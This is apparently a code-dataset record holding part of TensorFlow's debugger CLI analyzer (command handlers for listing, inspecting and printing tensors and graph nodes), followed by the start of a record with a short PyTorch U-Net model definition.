object.\n \"\"\"\n\n base_command = \"list_tensors\"\n if parsed.tensor_filter:\n base_command += \" -f %s\" % parsed.tensor_filter\n if parsed.op_type_filter:\n base_command += \" -t %s\" % parsed.op_type_filter\n if parsed.node_name_filter:\n base_command += \" -n %s\" % parsed.node_name_filter\n\n attr_segs = {0: []}\n row = self._TIMESTAMP_COLUMN_HEAD\n command = \"%s -s %s\" % (base_command, SORT_TENSORS_BY_TIMESTAMP)\n if parsed.sort_by == SORT_TENSORS_BY_TIMESTAMP and not parsed.reverse:\n command += \" -r\"\n attr_segs[0].append(\n (0, len(row), [debugger_cli_common.MenuItem(None, command), \"bold\"]))\n row += \" \" * (max_timestamp_width - len(row))\n\n prev_len = len(row)\n row += self._DUMP_SIZE_COLUMN_HEAD\n command = \"%s -s %s\" % (base_command, SORT_TENSORS_BY_DUMP_SIZE)\n if parsed.sort_by == SORT_TENSORS_BY_DUMP_SIZE and not parsed.reverse:\n command += \" -r\"\n attr_segs[0].append((prev_len, len(row),\n [debugger_cli_common.MenuItem(None, command), \"bold\"]))\n row += \" \" * (max_dump_size_width + max_timestamp_width - len(row))\n\n prev_len = len(row)\n 
row += self._OP_TYPE_COLUMN_HEAD\n command = \"%s -s %s\" % (base_command, SORT_TENSORS_BY_OP_TYPE)\n if parsed.sort_by == SORT_TENSORS_BY_OP_TYPE and not parsed.reverse:\n command += \" -r\"\n attr_segs[0].append((prev_len, len(row),\n [debugger_cli_common.MenuItem(None, command), \"bold\"]))\n row += \" \" * (\n max_op_type_width + max_dump_size_width + max_timestamp_width - len(row)\n )\n\n prev_len = len(row)\n row += self._TENSOR_NAME_COLUMN_HEAD\n command = \"%s -s %s\" % (base_command, SORT_TENSORS_BY_TENSOR_NAME)\n if parsed.sort_by == SORT_TENSORS_BY_TENSOR_NAME and not parsed.reverse:\n command += \" -r\"\n attr_segs[0].append((prev_len, len(row),\n [debugger_cli_common.MenuItem(\"\", command), \"bold\"]))\n row += \" \" * (\n max_op_type_width + max_dump_size_width + max_timestamp_width - len(row)\n )\n\n return debugger_cli_common.RichTextLines([row], font_attr_segs=attr_segs)\n\n def node_info(self, args, screen_info=None):\n \"\"\"Command handler for node_info.\n\n Query information about a given node.\n\n Args:\n args: Command-line arguments, excluding the command prefix, as a list of\n str.\n screen_info: Optional dict input containing screen information such as\n cols.\n\n Returns:\n Output text lines as a RichTextLines object.\n \"\"\"\n\n # TODO(cais): Add annotation of substrings for node names, to facilitate\n # on-screen highlighting/selection of node names.\n _ = screen_info\n\n parsed = self._arg_parsers[\"node_info\"].parse_args(args)\n\n # Get a node name, regardless of whether the input is a node name (without\n # output slot attached) or a tensor name (with output slot attached).\n node_name, unused_slot = debug_graphs.parse_node_or_tensor_name(\n parsed.node_name)\n\n if not self._debug_dump.node_exists(node_name):\n output = cli_shared.error(\n \"There is no node named \\\"%s\\\" in the partition graphs\" % node_name)\n _add_main_menu(\n output,\n node_name=None,\n enable_list_tensors=True,\n enable_node_info=False,\n enable_list_inputs=False,\n enable_list_outputs=False)\n return output\n\n # TODO(cais): Provide UI glossary feature to explain to users what the\n # term \"partition graph\" means and how it is related to TF graph objects\n # in Python. The information can be along the line of:\n # \"A tensorflow graph defined in Python is stripped of unused ops\n # according to the feeds and fetches and divided into a number of\n # partition graphs that may be distributed among multiple devices and\n # hosts. 
The partition graphs are what's actually executed by the C++\n # runtime during a run() call.\"\n\n lines = [\"Node %s\" % node_name]\n font_attr_segs = {\n 0: [(len(lines[-1]) - len(node_name), len(lines[-1]), \"bold\")]\n }\n lines.append(\"\")\n lines.append(\" Op: %s\" % self._debug_dump.node_op_type(node_name))\n lines.append(\" Device: %s\" % self._debug_dump.node_device(node_name))\n output = debugger_cli_common.RichTextLines(\n lines, font_attr_segs=font_attr_segs)\n\n # List node inputs (non-control and control).\n inputs = self._exclude_denylisted_ops(\n self._debug_dump.node_inputs(node_name))\n ctrl_inputs = self._exclude_denylisted_ops(\n self._debug_dump.node_inputs(node_name, is_control=True))\n output.extend(self._format_neighbors(\"input\", inputs, ctrl_inputs))\n\n # List node output recipients (non-control and control).\n recs = self._exclude_denylisted_ops(\n self._debug_dump.node_recipients(node_name))\n ctrl_recs = self._exclude_denylisted_ops(\n self._debug_dump.node_recipients(node_name, is_control=True))\n output.extend(self._format_neighbors(\"recipient\", recs, ctrl_recs))\n\n # Optional: List attributes of the node.\n if parsed.attributes:\n output.extend(self._list_node_attributes(node_name))\n\n # Optional: List dumps available from the node.\n if parsed.dumps:\n output.extend(self._list_node_dumps(node_name))\n\n if parsed.traceback:\n output.extend(self._render_node_traceback(node_name))\n\n _add_main_menu(output, node_name=node_name, enable_node_info=False)\n return output\n\n def _exclude_denylisted_ops(self, node_names):\n \"\"\"Exclude all nodes whose op types are in _GRAPH_STRUCT_OP_TYPE_DENYLIST.\n\n Args:\n node_names: An iterable of node or graph element names.\n\n Returns:\n A list of node names that are not denylisted.\n \"\"\"\n return [\n node_name for node_name in node_names\n if self._debug_dump.node_op_type(debug_graphs.get_node_name(node_name))\n not in self._GRAPH_STRUCT_OP_TYPE_DENYLIST\n ]\n\n def _render_node_traceback(self, node_name):\n \"\"\"Render traceback of a node's creation in Python, if available.\n\n Args:\n node_name: (str) name of the node.\n\n Returns:\n A RichTextLines object containing the stack trace of the node's\n construction.\n \"\"\"\n\n lines = [RL(\"\"), RL(\"\"), RL(\"Traceback of node construction:\", \"bold\")]\n\n try:\n node_stack = self._debug_dump.node_traceback(node_name)\n for depth, (file_path, line, function_name, text) in enumerate(\n node_stack):\n lines.append(\"%d: %s\" % (depth, file_path))\n\n attribute = debugger_cli_common.MenuItem(\n \"\", \"ps %s -b %d\" % (file_path, line)) if text else None\n line_number_line = RL(\" \")\n line_number_line += RL(\"Line: %d\" % line, attribute)\n lines.append(line_number_line)\n\n lines.append(\" Function: %s\" % function_name)\n lines.append(\" Text: \" + ((\"\\\"%s\\\"\" % text) if text else \"None\"))\n lines.append(\"\")\n except KeyError:\n lines.append(\"(Node unavailable in the loaded Python graph)\")\n except LookupError:\n lines.append(\"(Unavailable because no Python graph has been loaded)\")\n\n return debugger_cli_common.rich_text_lines_from_rich_line_list(lines)\n\n def list_inputs(self, args, screen_info=None):\n \"\"\"Command handler for inputs.\n\n Show inputs to a given node.\n\n Args:\n args: Command-line arguments, excluding the command prefix, as a list of\n str.\n screen_info: Optional dict input containing screen information such as\n cols.\n\n Returns:\n Output text lines as a RichTextLines object.\n \"\"\"\n\n # Screen info not currently 
used by this handler. Include this line to\n # mute pylint.\n _ = screen_info\n # TODO(cais): Use screen info to format the output lines more prettily,\n # e.g., hanging indent of long node names.\n\n parsed = self._arg_parsers[\"list_inputs\"].parse_args(args)\n\n output = self._list_inputs_or_outputs(\n parsed.recursive,\n parsed.node_name,\n parsed.depth,\n parsed.control,\n parsed.op_type,\n do_outputs=False)\n\n node_name = debug_graphs.get_node_name(parsed.node_name)\n _add_main_menu(output, node_name=node_name, enable_list_inputs=False)\n\n return output\n\n def print_tensor(self, args, screen_info=None):\n \"\"\"Command handler for print_tensor.\n\n Print value of a given dumped tensor.\n\n Args:\n args: Command-line arguments, excluding the command prefix, as a list of\n str.\n screen_info: Optional dict input containing screen information such as\n cols.\n\n Returns:\n Output text lines as a RichTextLines object.\n \"\"\"\n\n parsed = self._arg_parsers[\"print_tensor\"].parse_args(args)\n\n np_printoptions = cli_shared.numpy_printoptions_from_screen_info(\n screen_info)\n\n # Determine if any range-highlighting is required.\n highlight_options = cli_shared.parse_ranges_highlight(parsed.ranges)\n\n tensor_name, tensor_slicing = (\n command_parser.parse_tensor_name_with_slicing(parsed.tensor_name))\n\n node_name, output_slot = debug_graphs.parse_node_or_tensor_name(tensor_name)\n if (self._debug_dump.loaded_partition_graphs() and\n not self._debug_dump.node_exists(node_name)):\n output = cli_shared.error(\n \"Node \\\"%s\\\" does not exist in partition graphs\" % node_name)\n _add_main_menu(\n output,\n node_name=None,\n enable_list_tensors=True,\n enable_print_tensor=False)\n return output\n\n watch_keys = self._debug_dump.debug_watch_keys(node_name)\n if output_slot is None:\n output_slots = set()\n for watch_key in watch_keys:\n output_slots.add(int(watch_key.split(\":\")[1]))\n\n if len(output_slots) == 1:\n # There is only one dumped tensor from this node, so there is no\n # ambiguity. Proceed to show the only dumped tensor.\n output_slot = list(output_slots)[0]\n else:\n # There are more than one dumped tensors from this node. 
Indicate as\n # such.\n # TODO(cais): Provide an output screen with command links for\n # convenience.\n lines = [\n \"Node \\\"%s\\\" generated debug dumps from %s output slots:\" %\n (node_name, len(output_slots)),\n \"Please specify the output slot: %s:x.\" % node_name\n ]\n output = debugger_cli_common.RichTextLines(lines)\n _add_main_menu(\n output,\n node_name=node_name,\n enable_list_tensors=True,\n enable_print_tensor=False)\n return output\n\n # Find debug dump data that match the tensor name (node name + output\n # slot).\n matching_data = []\n for watch_key in watch_keys:\n debug_tensor_data = self._debug_dump.watch_key_to_data(watch_key)\n for datum in debug_tensor_data:\n if datum.output_slot == output_slot:\n matching_data.append(datum)\n\n if not matching_data:\n # No dump for this tensor.\n output = cli_shared.error(\"Tensor \\\"%s\\\" did not generate any dumps.\" %\n parsed.tensor_name)\n elif len(matching_data) == 1:\n # There is only one dump for this tensor.\n if parsed.number <= 0:\n output = cli_shared.format_tensor(\n matching_data[0].get_tensor(),\n matching_data[0].watch_key,\n np_printoptions,\n print_all=parsed.print_all,\n tensor_slicing=tensor_slicing,\n highlight_options=highlight_options,\n include_numeric_summary=parsed.numeric_summary,\n write_path=parsed.write_path)\n else:\n output = cli_shared.error(\n \"Invalid number (%d) for tensor %s, which generated one dump.\" %\n (parsed.number, parsed.tensor_name))\n\n _add_main_menu(output, node_name=node_name, enable_print_tensor=False)\n else:\n # There is more than one dump for this tensor.\n if parsed.number < 0:\n lines = [\n \"Tensor \\\"%s\\\" generated %d dumps:\" % (parsed.tensor_name,\n len(matching_data))\n ]\n font_attr_segs = {}\n\n for i, datum in enumerate(matching_data):\n rel_time = (datum.timestamp - self._debug_dump.t0) / 1000.0\n lines.append(\"#%d [%.3f ms] %s\" % (i, rel_time, datum.watch_key))\n command = \"print_tensor %s -n %d\" % (parsed.tensor_name, i)\n font_attr_segs[len(lines) - 1] = [(\n len(lines[-1]) - len(datum.watch_key), len(lines[-1]),\n debugger_cli_common.MenuItem(None, command))]\n\n lines.append(\"\")\n lines.append(\n \"You can use the -n (--number) flag to specify which dump to \"\n \"print.\")\n lines.append(\"For example:\")\n lines.append(\" print_tensor %s -n 0\" % parsed.tensor_name)\n\n output = debugger_cli_common.RichTextLines(\n lines, font_attr_segs=font_attr_segs)\n elif parsed.number >= len(matching_data):\n output = cli_shared.error(\n \"Specified number (%d) exceeds the number of available dumps \"\n \"(%d) for tensor %s\" %\n (parsed.number, len(matching_data), parsed.tensor_name))\n else:\n output = cli_shared.format_tensor(\n matching_data[parsed.number].get_tensor(),\n matching_data[parsed.number].watch_key + \" (dump #%d)\" %\n parsed.number,\n np_printoptions,\n print_all=parsed.print_all,\n tensor_slicing=tensor_slicing,\n highlight_options=highlight_options,\n write_path=parsed.write_path)\n _add_main_menu(output, node_name=node_name, enable_print_tensor=False)\n\n return output\n\n def list_outputs(self, args, screen_info=None):\n \"\"\"Command handler for list_outputs.\n\n Show the output recipients of a given node.\n\n Args:\n args: Command-line arguments, excluding the command prefix, as a list of\n str.\n screen_info: Optional dict input containing screen information such as\n cols.\n\n Returns:\n Output text lines as a RichTextLines object.\n \"\"\"\n\n # Screen info not currently used by this handler. 
Include this line to\n # mute pylint.\n _ = screen_info\n # TODO(cais): Use screen info to format the output lines more prettily,\n # e.g., hanging indent of long node names.\n\n parsed = self._arg_parsers[\"list_outputs\"].parse_args(args)\n\n output = self._list_inputs_or_outputs(\n parsed.recursive,\n parsed.node_name,\n parsed.depth,\n parsed.control,\n parsed.op_type,\n do_outputs=True)\n\n node_name = debug_graphs.get_node_name(parsed.node_name)\n _add_main_menu(output, node_name=node_name, enable_list_outputs=False)\n\n return output\n\n def evaluate_expression(self, args, screen_info=None):\n parsed = self._arg_parsers[\"eval\"].parse_args(args)\n\n eval_res = self._evaluator.evaluate(parsed.expression)\n\n np_printoptions = cli_shared.numpy_printoptions_from_screen_info(\n screen_info)\n return cli_shared.format_tensor(\n eval_res,\n \"from eval of expression '%s'\" % parsed.expression,\n np_printoptions,\n print_all=parsed.print_all,\n include_numeric_summary=True,\n write_path=parsed.write_path)\n\n def _reconstruct_print_source_command(self,\n parsed,\n line_begin,\n max_elements_per_line_increase=0):\n return \"ps %s %s -b %d -m %d\" % (\n parsed.source_file_path, \"-t\" if parsed.tensors else \"\", line_begin,\n parsed.max_elements_per_line + max_elements_per_line_increase)\n\n def print_source(self, args, screen_info=None):\n \"\"\"Print the content of a source file.\"\"\"\n del screen_info # Unused.\n\n parsed = self._arg_parsers[\"print_source\"].parse_args(args)\n\n source_annotation = source_utils.annotate_source(\n self._debug_dump,\n parsed.source_file_path,\n do_dumped_tensors=parsed.tensors)\n\n source_lines, line_num_width = source_utils.load_source(\n parsed.source_file_path)\n\n labeled_source_lines = []\n actual_initial_scroll_target = 0\n for i, line in enumerate(source_lines):\n annotated_line = RL(\"L%d\" % (i + 1), cli_shared.COLOR_YELLOW)\n annotated_line += \" \" * (line_num_width - len(annotated_line))\n annotated_line += line\n labeled_source_lines.append(annotated_line)\n\n if i + 1 == parsed.line_begin:\n actual_initial_scroll_target = len(labeled_source_lines) - 1\n\n if i + 1 in source_annotation:\n sorted_elements = sorted(source_annotation[i + 1])\n for k, element in enumerate(sorted_elements):\n if k >= parsed.max_elements_per_line:\n omitted_info_line = RL(\" (... Omitted %d of %d %s ...) 
\" % (\n len(sorted_elements) - parsed.max_elements_per_line,\n len(sorted_elements),\n \"tensor(s)\" if parsed.tensors else \"op(s)\"))\n omitted_info_line += RL(\n \"+5\",\n debugger_cli_common.MenuItem(\n None,\n self._reconstruct_print_source_command(\n parsed, i + 1, max_elements_per_line_increase=5)))\n labeled_source_lines.append(omitted_info_line)\n break\n\n label = RL(\" \" * 4)\n if self._debug_dump.debug_watch_keys(\n debug_graphs.get_node_name(element)):\n attribute = debugger_cli_common.MenuItem(\"\", \"pt %s\" % element)\n else:\n attribute = cli_shared.COLOR_BLUE\n\n label += RL(element, attribute)\n labeled_source_lines.append(label)\n\n output = debugger_cli_common.rich_text_lines_from_rich_line_list(\n labeled_source_lines,\n annotations={debugger_cli_common.INIT_SCROLL_POS_KEY:\n actual_initial_scroll_target})\n _add_main_menu(output, node_name=None)\n return output\n\n def _make_source_table(self, source_list, is_tf_py_library):\n \"\"\"Make a table summarizing the source files that create nodes and tensors.\n\n Args:\n source_list: List of source files and related information as a list of\n tuples (file_path, is_tf_library, num_nodes, num_tensors, num_dumps,\n first_line).\n is_tf_py_library: (`bool`) whether this table is for files that belong\n to the TensorFlow Python library.\n\n Returns:\n The table as a `debugger_cli_common.RichTextLines` object.\n \"\"\"\n path_head = \"Source file path\"\n num_nodes_head = \"#(nodes)\"\n num_tensors_head = \"#(tensors)\"\n num_dumps_head = \"#(tensor dumps)\"\n\n if is_tf_py_library:\n # Use color to mark files that are guessed to belong to TensorFlow Python\n # library.\n color = cli_shared.COLOR_GRAY\n lines = [RL(\"TensorFlow Python library file(s):\", color)]\n else:\n color = cli_shared.COLOR_WHITE\n lines = [RL(\"File(s) outside TensorFlow Python library:\", color)]\n\n if not source_list:\n lines.append(RL(\"[No files.]\"))\n lines.append(RL())\n return debugger_cli_common.rich_text_lines_from_rich_line_list(lines)\n\n path_column_width = max(\n max(len(item[0]) for item in source_list), len(path_head)) + 1\n num_nodes_column_width = max(\n max(len(str(item[2])) for item in source_list),\n len(num_nodes_head)) + 1\n num_tensors_column_width = max(\n max(len(str(item[3])) for item in source_list),\n len(num_tensors_head)) + 1\n\n head = RL(path_head + \" \" * (path_column_width - len(path_head)), color)\n head += RL(num_nodes_head + \" \" * (\n num_nodes_column_width - len(num_nodes_head)), color)\n head += RL(num_tensors_head + \" \" * (\n num_tensors_column_width - len(num_tensors_head)), color)\n head += RL(num_dumps_head, color)\n\n lines.append(head)\n\n for (file_path, _, num_nodes, num_tensors, num_dumps,\n first_line_num) in source_list:\n path_attributes = [color]\n if source_utils.is_extension_uncompiled_python_source(file_path):\n path_attributes.append(\n debugger_cli_common.MenuItem(None, \"ps %s -b %d\" %\n (file_path, first_line_num)))\n\n line = RL(file_path, path_attributes)\n line += \" \" * (path_column_width - len(line))\n line += RL(\n str(num_nodes) + \" \" * (num_nodes_column_width - len(str(num_nodes))),\n color)\n line += RL(\n str(num_tensors) + \" \" *\n (num_tensors_column_width - len(str(num_tensors))), color)\n line += RL(str(num_dumps), color)\n lines.append(line)\n lines.append(RL())\n\n return debugger_cli_common.rich_text_lines_from_rich_line_list(lines)\n\n def list_source(self, args, screen_info=None):\n \"\"\"List Python source files that constructed nodes and tensors.\"\"\"\n del 
screen_info # Unused.\n\n parsed = self._arg_parsers[\"list_source\"].parse_args(args)\n source_list = source_utils.list_source_files_against_dump(\n self._debug_dump,\n path_regex_allowlist=parsed.path_filter,\n node_name_regex_allowlist=parsed.node_name_filter)\n\n top_lines = [\n RL(\"List of source files that created nodes in this run\", \"bold\")]\n if parsed.path_filter:\n top_lines.append(\n RL(\"File path regex filter: \\\"%s\\\"\" % parsed.path_filter))\n if parsed.node_name_filter:\n top_lines.append(\n RL(\"Node name regex filter: \\\"%s\\\"\" % parsed.node_name_filter))\n top_lines.append(RL())\n output = debugger_cli_common.rich_text_lines_from_rich_line_list(top_lines)\n if not source_list:\n output.append(\"[No source file information.]\")\n return output\n\n output.extend(self._make_source_table(\n [item for item in source_list if not item[1]], False))\n output.extend(self._make_source_table(\n [item for item in source_list if item[1]], True))\n _add_main_menu(output, node_name=None)\n return output\n\n def _list_inputs_or_outputs(self,\n recursive,\n node_name,\n depth,\n control,\n op_type,\n do_outputs=False):\n \"\"\"Helper function used by list_inputs and list_outputs.\n\n Format a list of lines to display the inputs or output recipients of a\n given node.\n\n Args:\n recursive: Whether the listing is to be done recursively, as a boolean.\n node_name: The name of the node in question, as a str.\n depth: Maximum recursion depth, applies only if recursive == True, as an\n int.\n control: Whether control inputs or control recipients are included, as a\n boolean.\n op_type: Whether the op types of the nodes are to be included, as a\n boolean.\n do_outputs: Whether recipients, instead of input nodes are to be\n listed, as a boolean.\n\n Returns:\n Input or recipient tree formatted as a RichTextLines object.\n \"\"\"\n\n if do_outputs:\n tracker = self._debug_dump.node_recipients\n type_str = \"Recipients of\"\n short_type_str = \"recipients\"\n else:\n tracker = self._debug_dump.node_inputs\n type_str = \"Inputs to\"\n short_type_str = \"inputs\"\n\n lines = []\n font_attr_segs = {}\n\n # Check if this is a tensor name, instead of a node name.\n node_name, _ = debug_graphs.parse_node_or_tensor_name(node_name)\n\n # Check if node exists.\n if not self._debug_dump.node_exists(node_name):\n return cli_shared.error(\n \"There is no node named \\\"%s\\\" in the partition graphs\" % node_name)\n\n if recursive:\n max_depth = depth\n else:\n max_depth = 1\n\n if control:\n include_ctrls_str = \", control %s included\" % short_type_str\n else:\n include_ctrls_str = \"\"\n\n line = \"%s node \\\"%s\\\"\" % (type_str, node_name)\n font_attr_segs[0] = [(len(line) - 1 - len(node_name), len(line) - 1, \"bold\")\n ]\n lines.append(line + \" (Depth limit = %d%s):\" % (max_depth, include_ctrls_str\n ))\n\n command_template = \"lo -c -r %s\" if do_outputs else \"li -c -r %s\"\n self._dfs_from_node(\n lines,\n font_attr_segs,\n node_name,\n tracker,\n max_depth,\n 1, [],\n control,\n op_type,\n command_template=command_template)\n\n # Include legend.\n lines.append(\"\")\n lines.append(\"Legend:\")\n lines.append(\" (d): recursion depth = d.\")\n\n if control:\n lines.append(\" (Ctrl): Control input.\")\n if op_type:\n lines.append(\" [Op]: Input node has op type Op.\")\n\n # TODO(cais): Consider appending \":0\" at the end of 1st outputs of nodes.\n\n return debugger_cli_common.RichTextLines(\n lines, font_attr_segs=font_attr_segs)\n\n def _dfs_from_node(self,\n lines,\n attr_segs,\n 
node_name,\n tracker,\n max_depth,\n depth,\n unfinished,\n include_control=False,\n show_op_type=False,\n command_template=None):\n \"\"\"Perform depth-first search (DFS) traversal of a node's input tree.\n\n It recursively tracks the inputs (or output recipients) of the node called\n node_name, and appends these inputs (or output recipients) to a list of text\n lines (lines) with proper indentation that reflects the recursion depth,\n together with some formatting attributes (to attr_segs). The formatting\n attributes can include command shortcuts, for example.\n\n Args:\n lines: Text lines to append to, as a list of str.\n attr_segs: (dict) Attribute segments dictionary to append to.\n node_name: Name of the node, as a str. This arg is updated during the\n recursion.\n tracker: A callable that takes one str as the node name input and\n returns a list of str as the inputs/outputs.\n This makes this function general enough to be used with both\n node-input and node-output tracking.\n max_depth: Maximum recursion depth, as an int.\n depth: Current recursion depth. This arg is updated during the\n recursion.\n unfinished: A stack of unfinished recursion depths, as a list of int.\n include_control: Whether control dependencies are to be included as\n inputs (and marked as such).\n show_op_type: Whether the op types of the input nodes are to be displayed\n alongside the nodes' names.\n command_template: (str) Template for command shortcut of the node names.\n \"\"\"\n\n # Make a shallow copy of the list because it may be extended later.\n all_inputs = self._exclude_denylisted_ops(\n copy.copy(tracker(node_name, is_control=False)))\n is_ctrl = [False] * len(all_inputs)\n if include_control:\n # Sort control inputs or recipients in alphabetical order of the node\n # names.\n ctrl_inputs = self._exclude_denylisted_ops(\n sorted(tracker(node_name, is_control=True)))\n all_inputs.extend(ctrl_inputs)\n is_ctrl.extend([True] * len(ctrl_inputs))\n\n if not all_inputs:\n if depth == 1:\n lines.append(\" [None]\")\n\n return\n\n unfinished.append(depth)\n\n # Create depth-dependent hanging indent for the line.\n hang = \"\"\n for k in range(depth):\n if k < depth - 1:\n if k + 1 in unfinished:\n hang += HANG_UNFINISHED\n else:\n hang += HANG_FINISHED\n else:\n hang += HANG_SUFFIX\n\n if all_inputs and depth > max_depth:\n lines.append(hang + ELLIPSIS)\n unfinished.pop()\n return\n\n hang += DEPTH_TEMPLATE % depth\n\n for i, inp in enumerate(all_inputs):\n op_type = self._debug_dump.node_op_type(debug_graphs.get_node_name(inp))\n if op_type in self._GRAPH_STRUCT_OP_TYPE_DENYLIST:\n continue\n\n if is_ctrl[i]:\n ctrl_str = CTRL_LABEL\n else:\n ctrl_str = \"\"\n\n op_type_str = \"\"\n if show_op_type:\n op_type_str = OP_TYPE_TEMPLATE % op_type\n\n if i == len(all_inputs) - 1:\n unfinished.pop()\n\n line = hang + ctrl_str + op_type_str + inp\n lines.append(line)\n if command_template:\n attr_segs[len(lines) - 1] = [(\n len(line) - len(inp), len(line),\n debugger_cli_common.MenuItem(None, command_template % inp))]\n\n # Recursive call.\n # The input's/output's name can be a tensor name, in the case of a node\n # with >1 output slots.\n inp_node_name, _ = debug_graphs.parse_node_or_tensor_name(inp)\n self._dfs_from_node(\n lines,\n attr_segs,\n inp_node_name,\n tracker,\n max_depth,\n depth + 1,\n unfinished,\n include_control=include_control,\n show_op_type=show_op_type,\n command_template=command_template)\n\n def _format_neighbors(self, neighbor_type, non_ctrls, ctrls):\n \"\"\"List neighbors (inputs or 
recipients) of a node.\n\n Args:\n neighbor_type: (\"input\" | \"recipient\")\n non_ctrls: Non-control neighbor node names, as a list of str.\n ctrls: Control neighbor node names, as a list of str.\n\n Returns:\n A RichTextLines object.\n \"\"\"\n\n # TODO(cais): Return RichTextLines instead, to allow annotation of node\n # names.\n lines = []\n font_attr_segs = {}\n\n lines.append(\"\")\n lines.append(\" %d %s(s) + %d control %s(s):\" %\n (len(non_ctrls), neighbor_type, len(ctrls), neighbor_type))\n lines.append(\" %d %s(s):\" % (len(non_ctrls), neighbor_type))\n for non_ctrl in non_ctrls:\n line = \" [%s] %s\" % (self._debug_dump.node_op_type(non_ctrl),\n non_ctrl)\n lines.append(line)\n font_attr_segs[len(lines) - 1] = [(\n len(line) - len(non_ctrl), len(line),\n debugger_cli_common.MenuItem(None, \"ni -a -d -t %s\" % non_ctrl))]\n\n if ctrls:\n lines.append(\"\")\n lines.append(\" %d control %s(s):\" % (len(ctrls), neighbor_type))\n for ctrl in ctrls:\n line = \" [%s] %s\" % (self._debug_dump.node_op_type(ctrl), ctrl)\n lines.append(line)\n font_attr_segs[len(lines) - 1] = [(\n len(line) - len(ctrl), len(line),\n debugger_cli_common.MenuItem(None, \"ni -a -d -t %s\" % ctrl))]\n\n return debugger_cli_common.RichTextLines(\n lines, font_attr_segs=font_attr_segs)\n\n def _list_node_attributes(self, node_name):\n \"\"\"List the attributes of a node.\n\n Args:\n node_name: Name of the node of which the attributes are to be listed.\n\n Returns:\n A RichTextLines object.\n \"\"\"\n\n lines = []\n lines.append(\"\")\n lines.append(\"Node attributes:\")\n\n attrs = self._debug_dump.node_attributes(node_name)\n for attr_key in attrs:\n lines.append(\" %s:\" % attr_key)\n attr_val_str = repr(attrs[attr_key]).strip().replace(\"\\n\", \" \")\n lines.append(\" %s\" % attr_val_str)\n lines.append(\"\")\n\n return debugger_cli_common.RichTextLines(lines)\n\n def _list_node_dumps(self, node_name):\n \"\"\"List dumped tensor data from a node.\n\n Args:\n node_name: Name of the node of which the dumps are to be listed.\n\n Returns:\n A RichTextLines object.\n \"\"\"\n\n lines = []\n font_attr_segs = {}\n\n watch_keys = self._debug_dump.debug_watch_keys(node_name)\n\n dump_count = 0\n for watch_key in watch_keys:\n debug_tensor_data = self._debug_dump.watch_key_to_data(watch_key)\n for datum in debug_tensor_data:\n line = \" Slot %d @ %s @ %.3f ms\" % (\n datum.output_slot, datum.debug_op,\n (datum.timestamp - self._debug_dump.t0) / 1000.0)\n lines.append(line)\n command = \"pt %s:%d -n %d\" % (node_name, datum.output_slot, dump_count)\n font_attr_segs[len(lines) - 1] = [(\n 2, len(line), debugger_cli_common.MenuItem(None, command))]\n dump_count += 1\n\n output = debugger_cli_common.RichTextLines(\n lines, font_attr_segs=font_attr_segs)\n output_with_header = debugger_cli_common.RichTextLines(\n [\"%d dumped tensor(s):\" % dump_count, \"\"])\n output_with_header.extend(output)\n return output_with_header\n\n\ndef create_analyzer_ui(debug_dump,\n tensor_filters=None,\n ui_type=\"readline\",\n on_ui_exit=None,\n config=None):\n \"\"\"Create an instance of ReadlineUI based on a DebugDumpDir object.\n\n Args:\n debug_dump: (debug_data.DebugDumpDir) The debug dump to use.\n tensor_filters: (dict) A dict mapping tensor filter name (str) to tensor\n filter (Callable).\n ui_type: (str) requested UI type, only \"readline\" is supported.\n on_ui_exit: (`Callable`) the callback to be called when the UI exits.\n config: A `cli_config.CLIConfig` object.\n\n Returns:\n (base_ui.BaseUI) A BaseUI 
subtype object with a set of standard analyzer\n commands and tab-completions registered.\n \"\"\"\n if config is None:\n config = cli_config.CLIConfig()\n\n analyzer = DebugAnalyzer(debug_dump, config=config)\n if tensor_filters:\n for tensor_filter_name in tensor_filters:\n analyzer.add_tensor_filter(\n tensor_filter_name, tensor_filters[tensor_filter_name])\n\n cli = ui_factory.get_ui(ui_type, on_ui_exit=on_ui_exit, config=config)\n cli.register_command_handler(\n \"list_tensors\",\n analyzer.list_tensors,\n analyzer.get_help(\"list_tensors\"),\n prefix_aliases=[\"lt\"])\n cli.register_command_handler(\n \"node_info\",\n analyzer.node_info,\n analyzer.get_help(\"node_info\"),\n prefix_aliases=[\"ni\"])\n cli.register_command_handler(\n \"list_inputs\",\n analyzer.list_inputs,\n analyzer.get_help(\"list_inputs\"),\n prefix_aliases=[\"li\"])\n cli.register_command_handler(\n \"list_outputs\",\n analyzer.list_outputs,\n analyzer.get_help(\"list_outputs\"),\n prefix_aliases=[\"lo\"])\n cli.register_command_handler(\n \"print_tensor\",\n analyzer.print_tensor,\n analyzer.get_help(\"print_tensor\"),\n prefix_aliases=[\"pt\"])\n cli.register_command_handler(\n \"print_source\",\n analyzer.print_source,\n analyzer.get_help(\"print_source\"),\n prefix_aliases=[\"ps\"])\n cli.register_command_handler(\n \"list_source\",\n analyzer.list_source,\n analyzer.get_help(\"list_source\"),\n prefix_aliases=[\"ls\"])\n cli.register_command_handler(\n \"eval\",\n analyzer.evaluate_expression,\n analyzer.get_help(\"eval\"),\n prefix_aliases=[\"ev\"])\n\n dumped_tensor_names = []\n for datum in debug_dump.dumped_tensor_data:\n dumped_tensor_names.append(\"%s:%d\" % (datum.node_name, datum.output_slot))\n\n # Tab completions for command \"print_tensor\".\n cli.register_tab_comp_context([\"print_tensor\", \"pt\"], dumped_tensor_names)\n\n return cli\n","repo_name":"tensorflow/tensorflow","sub_path":"tensorflow/python/debug/cli/analyzer_cli.py","file_name":"analyzer_cli.py","file_ext":"py","file_size_in_byte":57643,"program_lang":"python","lang":"en","doc_type":"code","stars":178918,"dataset":"github-code","pt":"18"}
+{"seq_id":"28467815832","text":"# -*- coding: utf-8 -*-\n'''\nDescription: structure of Unet\n'''\nfrom model_parts import *\nimport torch\nfrom torch import optim\n\n\nclass UNet(nn.Module):\n    def __init__(self, n_channels, n_classes):\n        super(UNet, self).__init__()\n\n        # downsampling path\n        self.inc = inconv(n_channels, 16) \n        self.down1 = down(16, 32) \n        self.down2 = down(32, 64) \n        self.down3 = down(64, 128) \n        self.down4 = down(128, 128) \n\n        # upsampling path\n        self.up1 = up(256, 64, 128) \n        self.up2 = up(128, 32, 64) \n        self.up3 = up(64, 16, 32) \n        self.up4 = up(32, 16, 16) \n        self.outc = outconv(16, n_classes)\n\n    ## forward pass of the network\n    def forward(self, x_raw):\n\n        x1 = self.inc(x_raw)\n        x2 = self.down1(x1)\n        x3 = self.down2(x2)\n        x4 = self.down3(x3)\n        x5 = self.down4(x4)\n\n        x = self.up1(x5, x4)\n        x = self.up2(x, x3)\n        x = self.up3(x, x2)\n        x = self.up4(x, x1)\n        x = self.outc(x)\n\n        return x\n\n    